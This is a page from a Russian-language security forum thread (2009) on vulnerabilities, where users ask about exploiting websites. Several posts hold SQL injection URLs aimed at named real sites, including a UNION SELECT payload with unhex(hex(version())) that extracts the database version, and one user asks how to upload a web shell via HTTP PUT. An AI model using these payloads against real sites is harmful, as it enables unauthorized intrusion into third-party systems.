HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5541  
Старый 19.02.2009, 12:32
D1mka
Участник форума
Регистрация: 02.01.2008
Сообщений: 116
Провел на форуме:
1013405

Репутация: 58
По умолчанию

когда вверху странички пишет:
/includes/configure.php. Это - потенциальный риск безопасности - пожалуйста, установите необходимые права доступа к этому файлу.

что то можна зделать?
 
Ответить с цитированием

  #5542  
Старый 19.02.2009, 12:43
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
Сообщение от D1mka  
когда вверху странички пишет:
/includes/configure.php. Это - потенциальный риск безопасности - пожалуйста, установите необходимые права доступа к этому файлу.

что то можна зделать?
установить необходимые права и спать спокойно.
 
Ответить с цитированием

  #5543  
Старый 19.02.2009, 15:26
pingvit
Новичок
Регистрация: 10.03.2008
Сообщений: 27
Провел на форуме:
71866

Репутация: 1
По умолчанию

Можно ли провернуть SQL injection при ошибке следующего вида:

http://beatlesfestival.net.ua/requests.php?action=reset&requestid=sql'

Читал faq'и, везде используют конструкции вида +union+select+кол-во_полей--
А в данном случае, не пойму как это заюзать.
 
Ответить с цитированием

  #5544  
Старый 19.02.2009, 15:32
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

А с чего ты взял, что оно там есть и что оно не пофиксено?
 
Ответить с цитированием

  #5545  
Старый 19.02.2009, 15:37
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.sovtest.ru/news.php?id=999999999999%20union%20select%201,2,3, 4,5,6,7,8--
Как быть тут..? Вроде есть вывод. Циферки показывает.. А пишешь Version() и ппц -(
 
Ответить с цитированием

  #5546  
Старый 19.02.2009, 15:41
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Цитата:
Сообщение от Assembler  
http://www.sovtest.ru/news.php?id=999999999999%20union%20select%201,2,3, 4,5,6,7,8--
Как быть тут..? Вроде есть вывод. Циферки показывает.. А пишешь Version() и ппц -(
http://www.sovtest.ru/news.php?id=99999+union+select+1,unhex(hex(version ())),3,4,5,6,7,8--
 
Ответить с цитированием

  #5547  
Старый 19.02.2009, 15:43
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

aka PSIH, можешь пальцем тыкнуть где там вывод че то я в упор не вижу -(
 
Ответить с цитированием

  #5548  
Старый 19.02.2009, 15:47
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Цитата:
Сообщение от Assembler  
aka PSIH, можешь пальцем тыкнуть где там вывод че то я в упор не вижу -(
смотри

p.s: пробелы удали =\
 
Ответить с цитированием

  #5549  
Старый 19.02.2009, 18:49
Stradi
Познающий
Регистрация: 09.05.2008
Сообщений: 95
Провел на форуме:
433917

Репутация: 86
Отправить сообщение для Stradi с помощью ICQ
По умолчанию

Мм... Дайте почитать что-нибудь о PUT, TRACE и WRITE методах.
Или подскажите... Есть сайт, у него корень со всеми этими параметрами... Как мне загрузить туда шелл, etc.?
Спасибо...
 
Ответить с цитированием

  #5550  
Старый 19.02.2009, 18:53
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Stradi , тоесть нам нужно поискать в гугле и выложить тебе готовые линки? Или как?
Ты считаешь это вопрос по уязвимостям?

ГУГЛ:
RFC 2068
http://lib.misto.kiev.ua/WEBMASTER/rfc2068/rfc2068rus.txt

Если что-то ещё найти, обращайтесь, но сначала лучше попытаться сдесь:
Жмах

Последний раз редактировалось jokester; 19.02.2009 в 19:00..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ